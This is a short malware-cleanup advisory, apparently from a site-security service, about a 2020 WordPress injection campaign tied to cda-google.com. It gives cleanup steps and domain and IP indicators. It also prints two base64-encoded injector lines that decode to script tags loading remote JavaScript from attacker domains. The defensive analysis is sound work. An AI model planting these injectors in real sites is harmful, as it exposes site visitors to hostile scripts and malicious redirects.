Last updated: September 24 2020
According to publicwww index, aprox. 1223 sites are currently affected by this hack.
Need help? Let us clean your site.
Site files cleanup notes
Almost all web folders will get infected, so it will be wise to start fresh 100%.
1. Perform overall backup – site files and database;
2. Move all web files outside root folder, to prevent further data loss;
3. Rebuild everything making sure plugins, themes are all malware free;
4. Restore wp-config.php and wp-content/uploads folder, but make sure these are malware free ( manual check ); and
5. Make sure core files, plugins and theme are up-to-date ( delete everything unused or abandoned );
1. Use phpMyAdmin and look for “base64”, “cda-google.com” and “fromCharCode”;
2. Use a search and replace tool, to get rid of malicious entries:
3. Make sure no extra admin users were added by hackers;
Base64 Encrypted, Unescape & final scripthere: cda-google.com ( .txt file).
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU2MyU2NCU2MSUyZCU2NyU2ZiU2ZiU2NyU2YyU2NSUyZSU2MyU2ZiU2ZCUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=
Redirect to: hxxps://mol16.biz/?p=hbqwemrsgm5gi3bpgm2tamq
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=
Redirect to: hxxps://checkandgo.info/?p=gvsdezbtgm5gi3bpgi4da
Other domains hosted on 18.104.22.168: mol7.biz, mol9.biz, net06.biz, news98.biz, report3.biz, listlist.club, 27news.biz, 1mono.biz, 2solo.biz, 3mono.biz, 3sercher.biz, w5sercher.biz, w4sercher.biz.
Domain details: According to domaintools, domain was registered on 6/30/2020 and it’s pointing to Cloudflare.
Try our Free site check.